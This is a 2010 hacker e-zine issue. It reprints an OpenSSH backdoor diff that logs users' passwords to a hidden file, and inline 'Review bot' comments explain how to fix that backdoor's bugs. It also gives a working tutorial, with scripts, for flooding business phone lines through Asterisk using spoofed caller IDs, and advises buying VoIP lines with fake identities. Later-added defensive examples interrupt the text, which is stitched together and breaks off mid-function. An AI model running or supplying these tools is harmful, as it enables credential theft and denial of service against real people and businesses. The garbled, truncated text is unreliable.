Go Null Yourself E-Zine
Issue #2 - October 2010
www.GoNullYourself.org

"People who say it cannot be done should not interrupt those who are doing it."

|| 0x01 Introduction                           teh crew
|| 0x02 Feedback + Edits
|| 0x03 DoSing Phone Lines with Asterisk       b14ck
|| 0x04 duper's Code Corner                    duper
|| 0x05 Test Numbers                           storm
|| 0x06 Practical DLL Hijacking                storm
|| 0x07 Numbers Stations FOIA Request          teh crew
|| 0x08 Exploring Tieline Networks             Shadytel, Inc
|| 0x09 Modem Numbers                          storm
|| 0x0a Linux Full-Disk Encryption With TC     second
|| 0x0b Programming Challenge                  storm
|| 0x0c Hotel Pennsylvania's PBX               Shadytel, Inc
|| 0x0d Interview with Adrian Lamo
|| 0x0e Et Cetera, Etc.                        teh crew

[==================================================================================================]

-=[ 0x01 Introduction
-=[ Author: teh crew

Welcome to another issue of the Go Null Yourself e-zine, and, once again, glad you could join us.

You may have already noticed a few things different with this issue. First off, it was released fairly quickly after issue #1 (July 2010), much more quickly than is usual for e-zine series, as we are attempting to adopt a quarterly release schedule. This means that a lot of hard work is being put forth by our authors to meet such short deadlines with a sufficient amount of comprehensive, interesting content. For that, we express our deepest gratitude.
Secondly, we have changed a few aspects of the zine's formatting in general. The width has been increased from 86 columns to 100, mostly for the sake of reducing the frequency of problems with line wrapping in published code. It has also been requested that each article section be labeled with its respective hexadecimal index number for easy page jumping. If you have any suggestions for the zine, submit them to us (our contact information is at the end of this article), and we will certainly consider them.

Thirdly, a large chunk of the content in this issue is phone-related. We wish to accomplish two goals by doing this: 1) to promote interest in hacking technology besides computer systems, and 2) to pump some life back into the phreaking scene. There is so much to learn from exploring the phone system, and we hope to be there every step of the way.

If you are interested in submitting content for future issues of GNY Zine, we would be happy to review it for publication. Content may take many forms, whether it be a paper, review, scan, or first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some way are also appreciated. Well-received topics include computer hacking and exploitation methods, programming, telephone phreaking (both analog and digital), system and network exploration, hardware hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering. We are also receptive to content relating to concrete subjects such as science and mathematics, along with more abstract subjects such as psychology and culture. Both technical and non-technical material is accepted.

Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent via:

- IRC private message (storm or m0nkee @ irc.distrust.us #gny)
- Email (zine@gonullyourself.org)

If there is enough feedback, we will publish some of the messages in future issues.
We have devoted a lot of effort to this publication and hope that you learn something from reading it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed, utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless citing certain passages) and give credit to the original authors when and where necessary.

Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or damage that may result from the information presented within this publication. Although people will be people and act in idiotic fashions, we do not condone, promote, or participate in illegal behavior in any way.

[==================================================================================================]

-=[ 0x02 Feedback and Edits

This section is devoted to messages we've received regarding GNY Zine, both positive and negative. Readers may also submit information that they feel supplements content from previous issues. Significant errors in the zine will also be addressed.

----------------------------------------------------------------------------------------------------

Hey team.

On the release of the new e-zine, under the Alternate Data Streams article there's a little typo. In the first example, using C:\folders:secrets.txt, the paragraph below it refers to it as "C:folders:secrets.txt". It's not something that should throw a reader off the deep end or anything. I thought it should be pointed out in case you wanted to correct it.

I'm loving the articles so far. I hope you can keep up the work. I'll be coming back for sure.

Thanks,
-Boom

>> Ah, yes, you are correct - apologies for the error. "C:folders:secrets.txt" on line 412 of issue
>> #1 should be corrected to "C:\folders:secrets.txt". Thank you for reporting it and also for the
>> compliment.
----------------------------------------------------------------------------------------------------

rattle of www.awarenetwork.org posted the following on his website in response to the RTLO Spoofing article from issue #1:

I had a lot of fun reading the RTLO article in the GNY zine and found myself very incompetent when it came to inputting that RTLO char anywhere. Hence, I wrote a little program that would set my clipboard to just the RTLO char, allowing me to paste it into browser forms and other stuff conveniently. I did this because the other tool that was linked [http://www.fileformat.info/tool/unicodeinput/index.htm] isn't open source. Granted, my app has no GUI, but at least you can see its insides.

>> We agree that entering the RTLO character is quite tricky, and we thank you for publishing your
>> source code (below). Hopefully it is useful for other readers, as it's come in handy for us!
>> A pre-compiled Windows binary is available for download at
>> http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.exe

----------
http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.asm

.386
.model flat, stdcall
include kernel32.inc
include user32.inc

.code
Main:
    PUSH 0
    CALL OpenClipboard
    TEST EAX, EAX
    JZ ERROR
    CALL EmptyClipboard
    PUSH 4                      ; size of RTOL with nullchar (two UTF-16 code units)
    PUSH 2                      ; GMEM_MOVEABLE
    CALL GlobalAlloc
    TEST EAX,EAX
    JZ ERROR
    MOV EBX,EAX                 ; EBX = HGLOBAL (callee-saved, survives the calls below)
    PUSH EBX
    CALL GlobalLock
    TEST EAX,EAX
    JZ FREE_FAIL
    MOV word ptr [EAX], 0202EH  ; U+202E RIGHT-TO-LEFT OVERRIDE
    MOV word ptr [EAX+2], 0     ; terminator
    PUSH EBX
    CALL GlobalUnlock
    PUSH EBX                    ; handle
    PUSH 0DH                    ; CF_UNICODETEXT
    CALL SetClipboardData
    TEST EAX,EAX                ; NULL on failure
    JZ FREE_FAIL
    CALL CloseClipboard         ; success: the system now owns the block, so never free it
    PUSH 0
    JMP BAIL
FREE_FAIL:
    PUSH EBX
    CALL GlobalFree             ; failure: the block is still ours to release
ERROR:
    CALL CloseClipboard
    PUSH 1
BAIL:
    CALL ExitProcess
END Main

----------
http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.c

#include <windows.h>

int main()
{
    HGLOBAL handle;
    WCHAR *buffer;
    BOOL success = FALSE;

    if (OpenClipboard(NULL)) {
        EmptyClipboard();
        /* two UTF-16 code units: U+202E RIGHT-TO-LEFT OVERRIDE and the terminator */
        if ((handle = GlobalAlloc(GMEM_MOVEABLE, 2 * sizeof(WCHAR))) &&
            (buffer = GlobalLock(handle))) {
            buffer[0] = 0x202E;
            buffer[1] = 0;
            GlobalUnlock(handle);
            if (SetClipboardData(CF_UNICODETEXT, handle) != NULL) {
                success = TRUE;      /* the system owns the block now; do not free it */
            } else {
                GlobalFree(handle);  /* still ours on failure */
            }
        }
        CloseClipboard();
    }
    return !success;
}

#if 0
extern void __cdecl mainCRTStartup(void) { ExitProcess(main()); }
#endif

----------------------------------------------------------------------------------------------------

There have been reports that the patched source from Trojaning OpenSSH in issue #1 crashes upon SSH login. We regret and apologize for the error, which has been traced to an incorrect declaration of the hidden_buff buffer on line 38. The updated code is below:

diff -rupN openssh-5.5p1/auth-passwd.c openssh-5.5p1-backdoored/auth-passwd.c --- openssh-5.5p1/auth-passwd.c 2009-03-07 19:40:28.000000000 -0500 +++ openssh-5.5p1-backdoored/auth-passwd.c 2010-06-17 14:14:23.000000000 -0400 @@ -123,6 +123,19 @@ auth_password(Authctxt *authctxt, const } #endif result = sys_auth_passwd(authctxt, password); + + // Begin Backdoor + + if ( result ){ + snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Successful login %s:%s from %s\n", -> authctxt->user, password, get_remote_ipaddr()); + hidden_log(); + } else { + snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Invalid login %s:%s from %s\n", -> authctxt->user, password, get_remote_ipaddr()); + hidden_log(); + } + + // End Backdoor + if (authctxt->force_pwchange) disable_forwarding(); return (result && ok); diff -rupN openssh-5.5p1/includes.h openssh-5.5p1-backdoored/includes.h --- openssh-5.5p1/includes.h 2009-08-20 02:16:01.000000000 -0400 +++ openssh-5.5p1-backdoored/includes.h 2010-06-17 14:12:24.000000000 -0400 
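Review bot: In the auth_password() hunk, the `->` that begins the continuation of each snprintf call is the zine's line-wrap marker, not C, so the diff will neither apply nor compile until those two logical lines are rejoined. The bound `sizeof(hidden_buff) - 1` is also one byte short for no reason, since snprintf already counts the terminator within its size argument; `sizeof(hidden_buff)` is the correct bound. Finally the two branches differ only in one word, so a single `snprintf(hidden_buff, sizeof(hidden_buff), "%s login %s:%s from %s\n", result ? "Successful" : "Invalid", ...)` followed by one `hidden_log();` would halve the inserted code.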
@@ -172,4 +172,24 @@ #include "entropy.h"; +// Begin Backdoor + +#include <sys/stat.h> +#include <stdio.h> +#define HIDDEN_LOG_FILE "/tmp/.ssh_log" + +FILE *hiddenlog; +char hidden_buff[1024]; + +#define hidden_log() { \ + chmod(HIDDEN_LOG_FILE, 0666); \ + hiddenlog = fopen(HIDDEN_LOG_FILE, "a"); \ + if ( hiddenlog != NULL ) { \ + fprintf(hiddenlog, "%s", hidden_buff); \ + fclose(hiddenlog); \ + } \ +} + +// End Backdoor + #endif /* INCLUDES_H */ ---------------------------------------------------------------------------------------------------- Our long-time friend sunjester posted the following at http://fusecurity.com/blog/?p=186 in response to issue #1: GNY is a familiar group to myself. They do not like me on account of several reasons that we won�t go into here. The �ezine� they released isn�t offering much, so you didn�t miss much if your looking for another hacking zine to veg out to. I have some comments of my own about their release. I saw that r00tsecurity referenced the Zine in their newsletter, in which case I had to look at it.. >> Yes, there is a bit of bad blood between sunjester and GNY. We also won't go into details, as >> they are irrelevant. 1. conversational hypnosis 2. RTLO Spoofing 3. Alternate Data Streams 4. Derandomizing Perl�s Random Number Generator 5. Trojaning OpenSSH 6. Story of a Raid 7. Programming Challenge 8. ConfCon 2010 CFP 9. 907-887-88xx Scan conversational hypnosis The first thing on their list is something called �conversational hypnosis�, the whole thing was complete b.s.. Nothing described really actually told anyone how to apply or use �covert hypnosis� which is what is more widely known as. This whole idea is based around notions and persuasion. >> I wrote the article with the specific intention of not giving enough detail for readers to be >> able to use it since it can really cause damage. It was just to show that it was out there and >> said to listen to Taylor Starr's lectures if you wanted to learn it in depth. 
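Review bot: In the includes.h hunk, `FILE *hiddenlog;` and `char hidden_buff[1024];` are definitions, not declarations, placed in a header that every OpenSSH source file includes; each translation unit then carries its own copy and the link only succeeds if the compiler merges them as common symbols, which -fno-common (GCC's default since 10) refuses. Declare them `extern` in the header and define them once in auth-passwd.c. `chmod(HIDDEN_LOG_FILE, 0666)` also runs before `fopen(..., "a")` has created the file, so on the first login it fails on a nonexistent path and the log is created under sshd's umask instead; chmod after the fopen, or open(2) with an explicit mode. Lastly, `hidden_log()` expands to a bare brace block, so `if (x) hidden_log(); else ...` will not parse; the usual `do { ... } while (0)` wrapper avoids that.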
-hsu

rtlo spoofing

The reason this isn't so successful is because it's not very practical and it's a pain in the ass to use. This guy (Anarchy_Angel) basically just read the documents and wrote what he read. No PoC was offered or instructions or anything different than what was presented in the documents he referenced ([http://packetstormsecurity.org/papers/general/righttoleften-override.pdf], [http://hackers-hideaway.com/blog.php?post_id=94], [http://www.mozilla.org/security/announce/2009/mfsa2009-62.html]). I'm not going to continue to break down this method.

>> Actually, no. I (storm) wrote the article - it says so right at the top. Anarchy_Angel's
>> research was simply referenced. And yes, I wrote an article based on information I read. That's
>> usually how it works. The referenced paper on packetstormsecurity.org is written in broken
>> English, so I'm sure many will appreciate reading a paper that is easily decipherable;
>> hackers-hideaway.com was offline at the time (and continues to be offline), so Anarchy's research
>> is unavailable; and the mozilla.org link is simply an advisory. As for proof of concept, three
>> example attacks were explained in the paper. I also explained how the GNY forum was affected by
>> an RTLO spoofing attack.

Alternate Data Streams

At first glance I thought it may be worth reading until I kept scrolling down, scanning through and pulling out keywords, etc, etc. Scanning back to the top I started reading and it was apparent from reading the first couple paragraphs that this person had not done much research, or offered a solution to finding or protecting yourself against such flaws. The first thing people should know is that there is an EASY way to view alternate data streams. Microsoft provides an application named "Streams" to help view ADSs. You can download and read about it here. He references the application but never shows how to use it, link to it, or even talk about it.

He obviously rushed through and didn't give a crap about the actual content going into the message he was conveying in the article. While I don't deny information provided from the article can be useful and may have shown people something new, ADS, the information wasn't very fruitful, and could have been presented a lot better. Amir refers to metadata as "real data". He references forking but I guess he didn't bother to read it; if he had read the page he would have seen that it was named "metadata", lmao. This was a good topic, it just should have been elaborated on more.

>> "I'd like to thank you for taking the time to review my article... I see you have some valid
>> points, but you assumed that I 'rushed' in with the topic, which is not exactly true. When this
>> topic was first introduced to me, I liked it and I wanted to write a brief article to educate
>> others about it. It was not new research, and it was not something that is security related at
>> all. I was merely trying to let others know of the existence of such a thing. And by the way my
>> name is 'Amr' not 'Amir'. Have a good one :-)" -d4de

Derandomizing Perl's Random Number Generator

While it's fun to talk about and figure things like this out, it's not very effective for hacking or really having anything to do with computer security.

>> Random numbers have everything to do with computer security. Attacks based on the prediction of
>> random numbers, such as http://seclists.org/fulldisclosure/2010/Apr/167 , are becoming more and
>> more practical. A cryptographic process based on predictable numbers is a broken process.
>> Besides, we're not limited to content based solely on computer security. Anything that breaks or
>> circumvents a system of any kind is fascinating to us.

Trojaning OpenSSH

yep, he did all that from a root terminal...

>> So what's your point?

Story of a Raid

The crap this kid must have been smoking must be unbelievable! Damn, send some my way.

Let's highlight some of the dumbest shit he said. It's super ridiculous so let's keep it simple and try not to waste too much time on this dumb, uninformative, stereotypical story.

1. and it really will leave me open to anything the FBI wants to portray me as.
2. Incriminating evidence - Sure, it's just a simple server-client program in C
3. However, even if I did have a magnet, there is little time to do anything once they bust in.
4. My parents didn't completely realize what was going on

And my response..

1. Really? did they do it x-files style or "hackers" style? Kicking in the door with one foot while wielding a gun in the other? A friend of mine was raided last year, and once before that a few years before. The FBI certainly didn't kick in his door.

>> "'Hackers' style, they did literally kick in the door with guns held" -OrderZero

2. A client server application is hardly a crime, and would never be considered one.

>> "Are you aware of what a trojan /is/?" -OrderZero

3. Really? Do you know how much of a magnetic field is required to reset the drive? Yo momma's fridge magnet ain't gonna work.

>> "Yes I do and I never said a fridge magnet." -OrderZero

4. Wow, you still live with your parents? You're saying that the FBI would raid someone's house without knowing who was inside? I guess they wouldn't have traced the IP back to the ISP and called around huh? Go sit in the corner, change your name, and come back.

>> "What does the FBI knowing who was inside have to do with what I said at all? Yes, I live with
>> friends and family (or I did...). I'm 18-years-old. Honestly, if you're trying to insult me,
>> kindly rephrase it and actually make it relevant to the story, please and thanks." -OrderZero

ConfCon CFP

What is this, 1989?

>> *looks at calendar*

907-887-88xx Scan

come on guys, move into the new fuckin' millennium..

>> It's a damn shame your lack of curiosity is limiting your mind so severely. Pick up your phone
>> and tell me if you hear a dialtone.
>> Last I checked, there was still an entire PSTN waiting to be explored.

Et Cetera, Etc.

I could only read so much and all I have to say is these people have a long way to go before actually becoming anything close to a hacker or having any kind of "hacking ethics". In closing, be sure to know that the next release will be just as boring and shitty. Sorry guys but this was HORRIBLE and not worth reading or making the effort to archive.

>> :D

[==================================================================================================]

-=[ 0x03 DoSing Phone Lines with Asterisk
-=[ Author: b14ck
-=[ Website: http://projectb14ck.org/

Table of contents

1. Intro
2. Requirements
3. Installing pycall
4. Strategy
5. Your First DoS
6. A More Advanced DoS Technique
7. Tips
8. Conclusion
9. Questions?

Intro
-----

Denial of Service attacks are nothing new to people in the IT and computer security world. A DoS attack is a very simple form of attack which aims to flood the target (whether it be a computer, mobile device, or phone line) with traffic so that it cannot process legitimate traffic. While simple to perform, DoS attacks are often difficult to defend against without significant downtime.

Today I'm going to show you how to perform a DoS attack on a phone line. This process is simple, quick to perform, and very illegal. Before we get started, I'd just like to remind you that this article is for educational purposes only! All the code I'm putting into this article is python, and should work on any system with python 2.4+.

Requirements
------------

Now, in order to follow along you will need 3 main things:

* An Asterisk PBX system (our favorite open source PBX) set up and running.
* A lot of phone lines. We'll need a lot of phone lines because we'll need to place a lot of simultaneous calls. If you don't have hard lines, get a VoIP line (I prefer this method) as they are really cheap and quick to set up.
* The last thing you'll need is my pycall python library. This is a library I wrote which allows us to create Asterisk call files quickly and easily in python. (http://github.com/comradeb14ck/pycall)

For those of you unfamiliar with Asterisk, I'd highly recommend reading the PDF book Asterisk: The Future of Telephony, which is a great guide to getting started with Asterisk. (http://downloads.oreilly.com/books/9780596510480.pdf)

The pycall python library mentioned above is a project I created a month or so ago which makes placing calls through Asterisk a simple task for python developers. Call files are specially formatted text files which Asterisk processes and performs actions on. pycall simplifies and abstracts a great deal of the call file creation process, as call files have many small quirks which make them difficult to work with. Using pycall greatly reduces the amount of code we'll need to write and ensures that all call files are created in a secure, efficient manner. For this article, we'll be using my pycall library as a medium for quickly making calls through Asterisk without digging into the details. If you want to know more about pycall, check out the Why pycall? document on the project's wiki page.

Installing pycall
-----------------

The good news is that pycall installs simply (it's a portable python module) and will work out of the box with no modifications to your system whatsoever (as long as you are running some form of linux). To make things even easier, I've created a small shell script which you can run that will download and install pycall, then delete itself:

----------
#!/bin/bash
#
# pycall-install.sh
#
# @author: Randall Degges
# @email: rdegges@gmail.com
# @date: 11-20-2009
#
# This program installs the pycall library on any linux machine which has
# python 2.4+.
#

MIRROR=http://cloud.github.com/downloads/comradeb14ck/pycall/
NAME=pycall
VER=1.2

wget $MIRROR$NAME-$VER.tar.gz
tar zxvf $NAME-$VER.tar.gz
cd $NAME-$VER
sudo python setup.py install
cd ..
rm -rf $NAME-$VER
rm -rf $NAME-$VER.tar.gz

echo "Finished installing pycall-$VER."
----------

You can copy the script above and run it to install the library on any linux system quickly. Note that it fetches the tarball over plain HTTP and runs its setup.py as root, so check the tarball you downloaded before installing it on any machine you care about.

Next, we'll write a simple application which will call your cell phone in order to make sure everything is working. Here is the source.

NOTE: You will need to modify this code and fill in the appropriate details for your system. The user field (which seems a little ambiguous) refers to the user account that Asterisk is running under. If you want to create the call file as whatever user you are currently logged in as, you can remove that field altogether.

----------
#!/usr/bin/python
"""
hello-world.py

@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09

This program tests the pycall library and makes sure that you are able to
place calls correctly.
"""

from pycall.callfile import *


def main():
    """
    Create a call to your cell phone (for testing). It will say 'hello world'
    then hang up on you.
    """
    testcall = CallFile(
        trunk_type = 'SIP',
        trunk_name = 'flowroute',
        number = '18182223333',
        application = 'Playback',
        data = 'hello-world',
        user = 'asterisk'
    )
    testcall.run()


if __name__ == '__main__':
    """
    Program execution begins here.
    """
    main()
----------

A quick note to non-telephony people. The above code generates a text file (a call file) which is then moved to the Asterisk spool directory, /var/spool/asterisk/outgoing. Asterisk aggressively monitors the spool directory for call files (like the ones we are creating), parses them, and performs the actions specified by the call file. In this case, we are telling Asterisk to call our cell phone, and once we pick up, play a sound file that says "hello world" and then hang up. In case you are wondering, Asterisk ships with the "hello world" sound file by default, which is why we don't need anything else to make this work.
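To show what pycall is abstracting in the paragraph above, here is an added example (Python 3, written for this edition; it is not pycall's code and not b14ck's) that builds the call-file text by hand and drops it into the outgoing spool the way Asterisk expects. Channel, CallerID, MaxRetries, WaitTime, Application and Data are standard call-file keys and /var/spool/asterisk/outgoing is Asterisk's default outgoing directory; the staging directory, the digits-only number check and the 0644 file mode are this example's own choices. The two quirks it handles are the ones that bite people writing call files directly: a value containing a line break would let a caller append keys of their own to the file, and a file written straight into the outgoing directory can be picked up by Asterisk before it is complete, so it is written elsewhere on the same filesystem and renamed into place.

```python
import os
import re
import tempfile

# Asterisk's default spool layout; adjust for your install.
OUTGOING_DIR = "/var/spool/asterisk/outgoing"
STAGING_DIR = "/var/spool/asterisk/tmp"   # assumed sibling directory on the same filesystem

NUMBER_RE = re.compile(r"\+?[0-9]{3,15}")


def build_call_file(trunk_type, trunk_name, number, application, data="",
                    callerid_num=None, wait_time=45, max_retries=0):
    """Return the text of an Asterisk call file.

    The dialled number is restricted to digits so nothing but a number can end
    up in the Channel line, and every value is rejected if it contains a line
    break, because "Data: x\nChannel: Local/1" would otherwise smuggle a second
    key into the file.
    """
    if not NUMBER_RE.fullmatch(number):
        raise ValueError("number must be digits only: %r" % number)
    fields = [("Channel", "%s/%s/%s" % (trunk_type, trunk_name, number))]
    if callerid_num is not None:
        fields.append(("CallerID", callerid_num))
    fields += [
        ("MaxRetries", str(max_retries)),
        ("WaitTime", str(wait_time)),
        ("Application", application),
        ("Data", data),
    ]
    for key, value in fields:
        if "\n" in value or "\r" in value:
            raise ValueError("line break in call-file value for %s" % key)
    return "".join("%s: %s\n" % (key, value) for key, value in fields)


def spool_call_file(text, outgoing_dir=OUTGOING_DIR, staging_dir=STAGING_DIR):
    """Write `text` under staging_dir, rename it into outgoing_dir, return the path.

    Asterisk acts on any file it finds in the outgoing directory, so the file is
    never written there directly.  rename(2) is atomic when source and target are
    on the same filesystem, which is why a sibling of the outgoing directory is
    used for staging instead of /tmp.
    """
    fd, tmp_path = tempfile.mkstemp(prefix="call-", suffix=".tmp", dir=staging_dir)
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(text)
        os.chmod(tmp_path, 0o644)          # the Asterisk user must be able to read it
        final_path = os.path.join(outgoing_dir,
                                  os.path.basename(tmp_path)[:-4] + ".call")
        os.rename(tmp_path, final_path)
    except Exception:
        if os.path.exists(tmp_path):
            os.unlink(tmp_path)
        raise
    return final_path


if __name__ == "__main__":
    # The equivalent of the article's hello-world.py, without pycall.  The trunk
    # name and number are the article's placeholders.
    print(build_call_file("SIP", "flowroute", "18182223333", "Playback", "hello-world"))
```

The rename step is the part pycall's `user` field is really about: the file must end up readable by the account Asterisk runs under, and if your script runs as another user you either run it as that account or chown the file before the rename.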
Strategy
--------

Now that we have our tools ready to go, let's discuss our strategy for disabling the target phone line. The goal of the attack is to prevent the target phone number from placing and receiving calls. As you can probably imagine, this is completely devastating to businesses and other communication-dependent organizations, as it completely breaks down communications. Many companies in particular rely on telephone service (think pizza places and call centers) for their primary revenue stream. Imagine the effect a 24-hour DoS attack can have on a business which relies on phone service. The impact can be severe.

Our strategy is simple: call the target phone number more times than they have phone lines. You might be thinking: this is really easy, all I have to do is pick up my phone and keep dialing the target number over and over again to keep their phone line tied up. In reality, this does sometimes work. A great example is the 2002 New Hampshire Senate election phone jamming scandal. See http://en.wikipedia.org/wiki/2002_New_Hampshire_Senate_election_phone_jamming_scandal. Basically, "the NHGOP hired GOP Marketplace, based in Northern Virginia, to jam another phone bank being used by the state Democratic Party and the firefighters' union for efforts to turn out voters on behalf of then-governor Jeanne Shaheen on Election Day." And just in case you are wondering, yes, he went to jail. :)

In reality, most businesses and other places have more than a single phone line connected to their phone number. PRIs, T1s, and VoIP are all common now, which means that in order to completely prevent one of those phone lines from placing calls, you will need to generate upwards of 23 simultaneous calls (a full T1 PRI carries 23 voice channels) to completely disable the target. If you know anything about your target phone line, then you probably know how many calls you will need to place at any given time to keep them busy. But don't worry if you don't know anything about your target!
This will be covered later in this article.

Your First DoS
--------------

The program below contains the source of a simple flooding application. You will still have to make the same adjustments you made to the hello-world.py application earlier, but that's all, I promise!

----------
#!/usr/bin/python
"""
simple-flood.py

@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09

This program floods the specified phone number.
"""

from time import sleep
from sys import argv, exit
from pycall.callfile import *


def call(num):
    """
    Create a call to the specified number which does nothing except hang up.
    """
    testcall = CallFile(
        trunk_type = 'SIP',
        trunk_name = 'flowroute',
        number = num,
        application = 'Hangup',
        data = ' ',
        user = 'asterisk'
    )
    testcall.run()


def main():
    """
    Control the application logic.
    """
    if len(argv) < 3:
        print 'Usage: %s [number] [calls-per-minute]' % argv[0]
        exit(1)

    number = argv[1]
    try:
        cpm = int(argv[2])
    except ValueError:
        cpm = 1

    print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)

    count = 1
    while True:
        # Place a burst of cpm calls, then wait a minute before the next burst.
        for x in xrange(cpm):
            print 'Placing call %d...' % count
            call(number)
            count = count + 1
        sleep(60)


if __name__ == '__main__':
    """
    Program execution begins here.
    """
    main()
----------

This small program (only a few lines!) is able to completely paralyze a target number (provided you have enough phone lines). It is fairly flexible, and allows you to specify the number of calls per minute that you'd like to place. This works just as described: if you tell it to run with 60 calls per minute, it immediately places 60 calls, sleeps for a minute, and repeats. These calls ring the target number, and once the target picks up the phone, Asterisk immediately hangs up.

To run this program see the usage:

./simple-flood.py [number] [calls-per-minute]
./simple-flood.py 18002223333 5

The first parameter is the number you want to flood, and the second is the number of calls per minute that you'd like to place to that number.
Here's what it should look like running if everything goes smoothly:

[root@blackbox randall]# ./simple-flood.py 18182223333 5
Starting call flood on target: 18182223333. Placing 5 calls per minute.
Placing call 1...
Placing call 2...
Placing call 3...
Placing call 4...
Placing call 5...
Placing call 6...
Placing call 7...
Placing call 8...
Placing call 9...
Placing call 10...

Now, obviously, DoS attacks like this are simple to defend against, as the victim can simply block the particular number you are calling from. However, there are ways around this too!

A More Advanced DoS Technique
-----------------------------

To make it harder for the victim to defend against our simple DoS attack, let's add caller ID spoofing to the calls as well (this will only work if your provider allows you to set your own caller ID) so that the target can't blacklist a single number, because you are calling them from random numbers! Not only is doing this simple, it is also highly effective. Imagine being a business owner and instantly getting 100 calls from 100 different numbers. You'd be confused, unable to do anything except unplug your phone lines (which doesn't accomplish anything), and unable to receive business.

So here is our program with caller ID spoofing included. It is used the same way, except it is MUCH harder to defend against.

----------
#!/usr/bin/python
"""
advanced-flood.py

@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09

This program floods the specified phone number and spoofs caller ID, making it
much harder to trace / prevent.
"""

from time import sleep
from sys import argv, exit
from pycall.callfile import *
from random import seed, randint


def genid():
    """
    Generate a random 10-digit US telephone number to spoof caller ID to.
    """
    return str(randint(1000000000, 9999999999))


def call(num, cid):
    """
    Create a call to the specified number which does nothing except hang up.
    Also spoofs caller ID to a random 10 digit number.
    """
    testcall = CallFile(
        trunk_type = 'SIP',
        trunk_name = 'flowroute',
        callerid_num = cid,
        number = num,
        application = 'Hangup',
        data = ' ',
        user = 'asterisk'
    )
    testcall.run()


def main():
    """
    Control the application logic.
    """
    seed()  # seed the random number generator

    if len(argv) < 3:
        print 'Usage: %s [number] [calls-per-minute]' % argv[0]
        exit(1)

    number = argv[1]
    try:
        cpm = int(argv[2])
    except ValueError:
        cpm = 1

    print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)

    count = 1
    while True:
        # Each call in the burst gets a freshly generated caller ID.
        for x in xrange(cpm):
            cid = genid()
            print 'Placing call %d using caller ID %s...' % (count, cid)
            call(number, cid)
            count = count + 1
        sleep(60)


if __name__ == '__main__':
    """
    Program execution begins here.
    """
    main()
----------

Here's an example of what this program should look like running. Note that it generates a different caller ID for each call. >:)

[root@blackbox randall]# ./advanced-flood.py 18182223333 7
Starting call flood on target: 18182223333. Placing 7 calls per minute.
Placing call 1 using caller ID 7110992417...
Placing call 2 using caller ID 3689407130...
Placing call 3 using caller ID 4139439982...
Placing call 4 using caller ID 9795095964...
Placing call 5 using caller ID 5278670787...
Placing call 6 using caller ID 6684773360...
Placing call 7 using caller ID 2716775282...

Now this is a lot better!

Tips
----

The first tip is for those of you who don't know how many calls you have to place to disable your target. USE VOIP! VoIP providers are great for DoS attacks because they:

* Can be purchased online using a fake name / credit card.
* Are cheap (much less expensive than analog lines) and don't require additional hardware.
* Can place a ton of calls quickly. With hard lines you are limited to very few channels. With most VoIP lines, you are only limited by your bandwidth.

Of the 3 reasons above, reason 3 is particularly important. VoIP calls use either the IAX or SIP protocol to initiate calls.
When VoIP calls are made, SIP packets are sent back and forth between your server and your VoIP provider, who then relays the call to the target. What is special about this is that it uses almost no bandwidth. The only thing being transmitted is IAX or SIP signaling, and those packets are small. The bulk of the bandwidth usage typically associated with VoIP calls comes into play once a call has been answered: an RTP stream is opened, which sends a continuous flow of voice packets across your connection and increases your bandwidth usage immensely.

Why does this matter? It matters because it gives you a killer advantage that your target does not have: an easier way to scale your attack. Let's say a target phone number has 5 lines. Let's also assume that you are running this DoS from a home computer with an extremely limited internet connection that restricts you to 10KB/s up. That typically wouldn't be enough for a single VoIP call, so you would never be able to make 5 calls and flood your target. WRONG. Since you call the target and hang up the instant the call is answered, no RTP stream is ever set up. This means that you can place as many simultaneous calls as you can send SIP INVITEs (a LOT, though your provider's own per-trunk channel limit still applies).

Conclusion
----------

With the information and source code provided, you should be able to easily DoS yourself or stress test other phone numbers in no time. I've started development on what will soon be a fully completed Asterisk DoS client with lots of juicy command line options, statistics, and other cool items. If you're interested in following my progress, feel free to check out the project page for it at http://github.com/comradeb14ck/asteriskdos.

And that's about it!
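The article notes that the simple flood is easy to block and that spoofed caller IDs defeat a single blacklist. The defender's side of that, as an added example written for this edition (Python 3; not the article's code), is to look at call detail records rather than at caller IDs: the flood above leaves three marks that survive spoofing. Calls arrive at a rate no human caller produces, the ones that are answered have zero billable seconds because Asterisk hangs up on answer, and `randint(1000000000, 9999999999)` produces many numbers that are not valid NANP numbers at all (area codes starting with 0 or 1, exchanges starting with 0 or 1). The CDR lines below are constructed for the example in a simplified format (start time, caller ID, called number, billable seconds, disposition); the thresholds are assumptions to tune for your own traffic.

```python
import re
from collections import defaultdict

# Constructed sample CDR lines (not real Asterisk output). The first seven caller
# IDs are the ones shown in the article's advanced-flood.py run; the rest are
# made up. Fields: start (epoch seconds), caller ID, called number, billsec,
# disposition.
SAMPLE_CDR = """\
1286000000,7110992417,18182223333,0,ANSWERED
1286000002,3689407130,18182223333,0,ANSWERED
1286000003,4139439982,18182223333,0,ANSWERED
1286000005,9795095964,18182223333,0,ANSWERED
1286000006,5278670787,18182223333,0,ANSWERED
1286000008,6684773360,18182223333,0,ANSWERED
1286000009,2716775282,18182223333,0,ANSWERED
1286000011,1502338871,18182223333,0,ANSWERED
1286000012,8240157326,18182223333,0,ANSWERED
1286000014,4061993408,18182223333,0,NO ANSWER
1286000015,9120554471,18182223333,0,ANSWERED
1286000004,2125551212,18185550100,184,ANSWERED
1286000900,3105550199,18185550100,42,ANSWERED
"""

# NANP shape NXX-NXX-XXXX: area code and exchange each start with 2-9.
NANP_RE = re.compile(r"[2-9]\d\d[2-9]\d{6}")


def nanp_plausible(cid):
    """True if cid is a 10-digit number of NANP shape (a cheap structural check only)."""
    return NANP_RE.fullmatch(cid) is not None


def parse_cdr(text):
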